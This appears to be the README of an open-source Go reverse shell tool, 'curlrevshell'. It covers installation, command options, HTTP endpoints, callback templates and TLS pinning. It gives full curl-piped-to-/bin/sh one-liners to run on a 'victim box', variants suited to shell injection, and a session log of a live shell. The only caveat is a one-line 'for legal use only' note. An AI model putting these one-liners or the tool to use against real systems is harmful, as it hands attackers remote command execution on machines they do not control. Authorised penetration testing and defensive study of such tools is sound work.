cURL-Powered Reverse Shell
Somewhat kooky replacement for the typical bash >/dev/tcp...
reverse shell,
but with the following "features":
- Underlying comms via HTTPS via double cURL
- Self-signed TLS certificate, plus certificate pinning
- Optionally serves static files
- Accepts multiple shells in series, like
nc -lk
but in color
- IPv6-ready
- Non-zero documentation
For legal use only
Quickstart
- Install the Go compiler (https://go.dev/doc/install).
- Install
curlrevshell
and start it.
go install github.com/magisterquis/curlrevshell@latest
curlrevshell
- Get a shell, using one of the lines under
To get a shell:
.
There are a few options, try -h
for a list.
Example
It should look like the following, but with nicer colors:
$ go install github.com/magisterquis/curlrevshell@latest
go: downloading github.com/magisterquis/curlrevshell v0.0.1-beta.6
go: downloading golang.org/x/sync v0.7.0
go: downloading golang.org/x/net v0.25.0
go: downloading github.com/magisterquis/goxterm v0.0.1-beta.2
go: downloading golang.org/x/tools v0.21.0
go: downloading golang.org/x/sys v0.20.0
go: downloading golang.org/x/text v0.15.0
$ curlrevshell
01:04:42.760 Listening on 0.0.0.0:4444
01:04:42.760 To get a shell:
curl -sk --pinnedpubkey sha256//9nkpEPFYzXMxoVTGImPROp+qkk+B1QQIut2jX4qohgY= https://192.168.1.10:4444/c | /bin/sh
01:04:55.247 [192.168.1.20] Sent script: ID:zcj5vz3zp6ce URL:192.168.1.10:4444
01:04:55.259 [192.168.1.20] Input connected: ID:1jns1whwi1p1q
01:04:55.259 [192.168.1.20] Output connected: ID:1jns1whwi1p1q
01:04:55.259 [192.168.1.20] Shell is ready to go!
> id
01:05:10.753 uid=1000(you) gid=1000(you) groups=1000(you), 0(wheel), 117(dialer)
On 192.168.1.20
, the victim box, somewhere between 01:04:42.760
and 01:04:55.247
:
curl -sk --pinnedpubkey sha256//9nkpEPFYzXMxoVTGImPROp+qkk+B1QQIut2jX4qohgY= https://192.168.1.10:4444/c | /bin/sh
Usage
Usage: curlrevshell [options]
Even worse reverse shell, powered by cURL.
Keyboard Shortcuts:
Ctrl+O - Mute output for a couple of seconds (for if you cat a huge file)
Options:
-callback-address address
Additional callback address or domain, for one-liner printing (may be repeated)
-callback-template template
Optional callback template file, used if it exists
-icanhazip
Query icanhazip.com for a callback address
-ipv6-one-liners
Also print callback one-liners with IPv6 addresses
-listen-address address
Listen address (default "0.0.0.0:4444")
-log file
Optional file to which to write JSON logs
-no-timestamps
Don't print timestamps
-one-shell
Close listening socket when first shell connects
-print-default-template
Write the default template to stdout and exit
-prompt string
Terminal prompt; don't forget a trailing space (default "> ")
-serve-files-from directory
Optional directory from which to serve static files
-tls-certificate-cache file
Optional file in which to cache generated TLS certificate (default "/home/stuart/.cache/sstls/cert.txtar")
Details
Under the hood, it's really just a little HTTP server with four endpoints:
Endpoint |
Description |
/i/{id} |
Long-lived connection for input from you to the shell. |
/o/{id} |
Output from the shell to you, one line at a time. The {id} has to match /i 's. |
/c |
Serves up a little script that takes the place of bash >/dev/tcp... and makes you appreciate low PIDs. |
/{anythingelse} |
Either serves up files or 404's if nobody gave it -serve-files-from (which doesn't actually have to be a directory). |
Callback Template
The script generated with /c
can be changed by writing a new template and
telling the program about it with -print-default-template
. It usually looks
like
$ curlrevshell -print-default-template >custom.tmpl # Get the default template to start with
$ vim ./custom.tmpl # Mod ALL the things!
$ curlrevshell -callback-template ./custom.tmpl # Run with your fancy new template
The struct passed to the template is TemplateParams
in
script.go. The default template is
script.tmpl. It's re-read every time it's needed,
so feel free to change it as often as you'd like.
Callback Address
Most of the time if you can connect to the server to grab a script (i.e. /c
)
the server will work out the right callback address. Most of the time. For
those times which aren't Most, giving a URL with either a c2
parameter to /c
or a c2:
header should clear things up. This is clearer with an example:
As a URL parameter
The Request for a script:
curl -sk --pinnedpubkey sha256//9nkpEPFYzXMxoVTGImPROp+qkk+B1QQIut2jX4qohgY= https://192.168.1.10:4444/c?c2=kittens.com'
The curl
command in the script:
curl -Nsk --pinnedpubkey "sha256//9nkpEPFYzXMxoVTGImPROp+qkk+B1QQIut2jX4qohgY=" https://kittens.com/i/1upal29kpq9g7 </dev/null 2>&0 |
With ?c2=kittens.com
it would have been https://192.168.1.10:4444
instead.
The server also tells us that the script was generated for kittens.com
:
22:08:20.488 [192.168.1.20] Sent script: ID:1upal29kpq9g7 URL:kittens.com
Sometimes it's a pain to put ?
and such in shell injection. Headers are
easier. We'll also add a port this time.
curl -Hc2:kittens.com:22 -sk --pinnedpubkey sha256//9nkpEPFYzXMxoVTGImPROp+qkk+B1QQIut2jX4qohgY= https://192.168.1.10:4444/c
Weird flex, but it worked.
curl -Nsk --pinnedpubkey "sha256//9nkpEPFYzXMxoVTGImPROp+qkk+B1QQIut2jX4qohgY=" https://kittens.com:22/i/2v0ohzqf5kw1t </dev/null 2>&0 |
Server agrees
22:14:13.902 [192.168.1.20] Sent script: ID:2v0ohzqf5kw1t URL:kittens.com:22
TLS
TLS is all via a pinned self-signed certificate. By default, the certificate
is cached in a file, mostly to keep from having to copy/paste a new fingerprint
every time a ragey Ctrl+C kills the current shell. Caching can be disabled
with -tls-certificate-cache ""
.